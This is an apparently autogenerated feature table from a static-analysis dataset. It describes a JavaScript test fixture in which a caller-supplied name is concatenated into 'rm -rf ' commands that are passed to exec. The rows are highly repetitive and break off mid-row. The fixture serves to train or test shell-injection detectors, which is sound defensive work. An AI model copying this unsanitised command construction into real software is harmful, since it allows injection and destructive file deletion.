autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:43 | "rm -rf " | stringConcatenatedWith | -endpoint- name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:50 | "rm -rf " + name | CalleeFlexibleAccessPath | import(!).exec | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:50 | "rm -rf " + name | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:50 | "rm -rf " + name | calleeImports | mz/child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:50 | "rm -rf " + name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:50 | "rm -rf " + name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:50 | "rm -rf " + name | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:50 | "rm -rf " + name | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:35:50:50 | "rm -rf " + name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:47:50:50 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:47:50:50 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:47:50:50 | name | enclosingFunctionBody | name require mz/child_process exec rm -rf name | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:47:50:50 | name | enclosingFunctionName | mz | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:47:50:50 | name | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:50:47:50:50 | name | stringConcatenatedWith | 'rm -rf ' -endpoint- | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:53:6 | module | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:53:6 | module | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:53:6 | module | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:53:14 | module.exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:53:14 | module.exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:53:14 | module.exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:53:19 | module.exports.flow | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:53:19 | module.exports.flow | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:53:19 | module.exports.flow | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:62:1 | module. ... md2);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:62:1 | module. ... md2);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:1:62:1 | module. ... md2);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:8:53:14 | exports | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:8:53:14 | exports | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:8:53:14 | exports | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:16:53:19 | flow | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:16:53:19 | flow | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:16:53:19 | flow | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:53:22 | cp | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:53:22 | cp | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:53:22 | cp | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:53:22 | cp | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:53:22 | cp | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:53:22 | this | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:53:22 | this | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:53:22 | this | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:53:22 | this | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:53:22 | this | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | 'arguments' object of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | 'arguments' object of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | 'arguments' object of anonymous function | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | 'arguments' object of anonymous function | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | 'arguments' object of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | exceptional return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | exceptional return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | exceptional return of anonymous function | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | exceptional return of anonymous function | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | exceptional return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | functio ... md2);\\n} | assignedToPropName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | functio ... md2);\\n} | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | functio ... md2);\\n} | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | functio ... md2);\\n} | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | return of anonymous function | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | return of anonymous function | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | return of anonymous function | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | return of anonymous function | enclosingFunctionName | flow | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:23:62:1 | return of anonymous function | fileImports | ./isImported ./lib2.js async-execute child_process fs mz/child_process path printf util | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:33:53:36 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:33:53:36 | name | contextFunctionInterfaces | Cla5(name)\nMyTrainer(opts)\naccessSync(name)\narrays(name)\nasyncStuff(name)\nbar(name)\nbar(name)\nbla(name)\nblackList2(name)\nblacklistOfChars(name)\nboundProblem(safe, unsafe)\nbuild(first, last)\ncheck(config)\ncla()\ncla2()\ncleanInput(s)\ncmd(command, name)\nconstructor()\nconstructor(name)\nconstructor(name)\nexports(name)\nflow(name)\nfoo(name)\nfoo(name)\nformat(name)\nget()\ngoodSanitizer(name)\nguard(name)\nguard2(name)\nid(x)\nindirect(name)\nindirect2(name)\nmethod(name)\nmethod(name)\nmyExec(cmd)\nmyFunc(name)\nmyIndirectThing(name)\nmz(name)\nproblematic(n)\nsafe(name)\nsanitizeShellString(str)\nsanitizer(name)\nsanitizer2(name)\nsanitizer3(name)\nsanitizer4(name)\nsanitizerProperty(obj)\nshellOption(name)\nsplitConcat(name)\nstart(opts)\nstringConcat(name)\ntrain()\ntypeofNumber(n)\ntypeofcheck(arg)\ntypeofcheck(name)\nunproblematic()\nvalid(name)\nwha(name)\nwhitelistOfChars(name)\nyetAnohterSanitizer(str) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:33:53:36 | name | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:33:53:36 | name | contextSurroundingFunctionParameters | (name) | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:33:53:36 | name | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:33:53:36 | name | enclosingFunctionBody | name cmd1 rm -rf name cp exec cmd1 cmd2 rm -rf name myExec cmd cp exec cmd myExec cmd2 | +| autogenerated/ShellCommandInjectionFromEnvironment/UnsafeShellCommandConstruction/lib/lib.js:53:33:53:36 | name | enclosingFunctionName | flow | +| 